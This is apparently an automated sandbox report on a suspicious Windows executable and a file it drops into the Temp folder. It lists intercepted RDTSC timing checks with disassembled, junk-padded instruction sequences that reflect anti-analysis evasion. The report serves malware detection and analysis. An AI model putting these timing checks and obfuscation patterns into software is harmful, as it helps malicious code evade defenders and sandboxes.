Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10B04 second address: 4E10B1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8864h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10B1C second address: 4E10B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [769B459Ch], 05h 0x0000000f pushad 0x00000010 mov dx, A7F0h 0x00000014 mov bx, 531Ch 0x00000018 popad 0x00000019 je 00007F88C6AECA50h 0x0000001f pushad 0x00000020 jmp 00007F8854FAEB91h 0x00000025 movzx esi, di 0x00000028 popad 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ax, AA8Bh 0x00000031 mov ah, 64h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10E72 second address: 4E10E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10E76 second address: 4E10E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10E7A second address: 4E10E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20997 second address: 4E2099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2099D second address: 4E209A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E209A1 second address: 4E209E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, eax 0x00000011 pushfd 0x00000012 jmp 00007F8854FAEB96h 0x00000017 and cx, 1608h 0x0000001c jmp 00007F8854FAEB8Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E209E7 second address: 4E20ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007F8854FD8863h 0x00000012 jmp 00007F8854FD8863h 0x00000017 popfd 0x00000018 pop esi 0x00000019 call 00007F8854FD8869h 0x0000001e jmp 00007F8854FD8860h 0x00000023 pop eax 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 mov bl, 6Ah 0x0000002a mov si, 710Fh 0x0000002e popad 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 mov cx, 7307h 0x00000035 pushfd 0x00000036 jmp 00007F8854FD885Ch 0x0000003b sub eax, 65FB1AB8h 0x00000041 jmp 00007F8854FD885Bh 0x00000046 popfd 0x00000047 popad 0x00000048 push eax 0x00000049 jmp 00007F8854FD8869h 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 pushad 0x00000051 movzx esi, di 0x00000054 mov dx, D23Ah 0x00000058 popad 0x00000059 mov dx, D806h 0x0000005d popad 0x0000005e mov esi, dword ptr [ebp+0Ch] 0x00000061 pushad 0x00000062 mov cx, dx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20ABE second address: 4E20B14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test esi, esi 0x0000000c pushad 0x0000000d mov ecx, 15E42C43h 0x00000012 pushfd 0x00000013 jmp 00007F8854FAEB98h 0x00000018 adc esi, 2C406908h 0x0000001e jmp 00007F8854FAEB8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 je 00007F88C6ADC435h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B14 second address: 4E20B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B18 second address: 4E20B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B33 second address: 4E20B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B38 second address: 4E20B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 1Eh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [769B459Ch], 05h 0x00000010 jmp 00007F8854FAEB8Ch 0x00000015 je 00007F88C6AF44C9h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8854FAEB8Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B68 second address: 4E20B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B6C second address: 4E20B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B72 second address: 4E20B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F8854FD8860h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B9C second address: 4E20BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20BA0 second address: 4E20BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20BA6 second address: 4E20BC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20BC0 second address: 4E20BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8867h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20C51 second address: 4E20C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop esi 0x00000011 movsx ebx, ax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31444F second address: 31447F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD8869h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8854FD885Eh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31334A second address: 313355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3136B4 second address: 3136BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31380B second address: 313845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Eh 0x00000007 jmp 00007F8854FAEB8Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F8854FAEB93h 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 313845 second address: 31385E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FD8864h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31385E second address: 313869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 313869 second address: 31386D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3164D9 second address: 3164DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31665A second address: 31665F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31665F second address: 3166D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB8Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 1598FFF1h 0x00000013 mov dword ptr [ebp+122D3561h], ecx 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F8854FAEB88h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 mov esi, 1984C6A6h 0x0000003a mov di, cx 0x0000003d push 00000000h 0x0000003f mov dword ptr [ebp+122D3488h], ebx 0x00000045 mov dword ptr [ebp+122D3451h], esi 0x0000004b push 00000003h 0x0000004d mov edi, 3E02266Bh 0x00000052 push BFEA76BCh 0x00000057 pushad 0x00000058 jl 00007F8854FAEB88h 0x0000005e push ecx 0x0000005f pop ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3166D0 second address: 3166D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 316747 second address: 31674D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31674D second address: 3167A7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8854FD8856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jne 00007F8854FD885Ah 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F8854FD8858h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D18B8h], eax 0x00000037 call 00007F8854FD8859h 0x0000003c jmp 00007F8854FD885Bh 0x00000041 push eax 0x00000042 push edi 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3167A7 second address: 3167F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB8Fh 0x00000009 popad 0x0000000a pop edi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F8854FAEB92h 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 jmp 00007F8854FAEB99h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3167F1 second address: 31686A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F8854FD885Dh 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F8854FD8858h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov si, bx 0x0000002f push 00000003h 0x00000031 and edx, 2A1E57FFh 0x00000037 push 00000000h 0x00000039 jno 00007F8854FD8856h 0x0000003f push 00000003h 0x00000041 call 00007F8854FD8859h 0x00000046 jmp 00007F8854FD8866h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jo 00007F8854FD8858h 0x00000054 push ebx 0x00000055 pop ebx 0x00000056 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31686A second address: 316870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 316870 second address: 316874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 316874 second address: 3168E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnl 00007F8854FAEB8Eh 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007F8854FAEB95h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 pushad 0x00000021 push esi 0x00000022 push esi 0x00000023 pop esi 0x00000024 pop esi 0x00000025 pushad 0x00000026 push edi 0x00000027 pop edi 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b popad 0x0000002c pop eax 0x0000002d mov edx, 7181E125h 0x00000032 lea ebx, dword ptr [ebp+1244B3F9h] 0x00000038 push ebx 0x00000039 mov dword ptr [ebp+122D34C3h], esi 0x0000003f pop esi 0x00000040 xchg eax, ebx 0x00000041 jbe 00007F8854FAEB92h 0x00000047 jo 00007F8854FAEB8Ch 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3168E3 second address: 3168F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F8854FD885Ch 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 338AF4 second address: 338AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 338AF9 second address: 338B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336D2D second address: 336D37 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336E7B second address: 336E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8854FD8856h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336E85 second address: 336E8F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336E8F second address: 336E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336E95 second address: 336EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push esi 0x0000000c jo 00007F8854FAEB86h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336EBD second address: 336ED6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8865h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337171 second address: 33717B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3375D5 second address: 3375DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3375DA second address: 3375F7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8854FAEB88h 0x00000008 jmp 00007F8854FAEB8Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3375F7 second address: 3375FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3375FF second address: 33760B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 33760B second address: 337610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337610 second address: 33762B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB92h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3378A1 second address: 3378AB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8854FD8856h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3378AB second address: 3378B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3378B1 second address: 3378CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8865h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3378CC second address: 3378D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3378D0 second address: 3378F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8854FD885Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F8854FD885Ch 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337A4E second address: 337A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337A55 second address: 337A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337A5B second address: 337A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337A5F second address: 337A65 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337BD4 second address: 337BE1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337BE1 second address: 337BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337BE9 second address: 337BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8854FAEB86h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337BF7 second address: 337C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007F8854FD8856h 0x0000000e popad 0x0000000f jbe 00007F8854FD8865h 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337C21 second address: 337C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 33817C second address: 338182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3384B8 second address: 3384DA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F8854FAEB92h 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3384DA second address: 3384DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3384DE second address: 33850B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8854FAEB86h 0x00000008 jmp 00007F8854FAEB8Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F8854FAEB86h 0x00000017 jmp 00007F8854FAEB8Eh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 32B1AE second address: 32B1B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
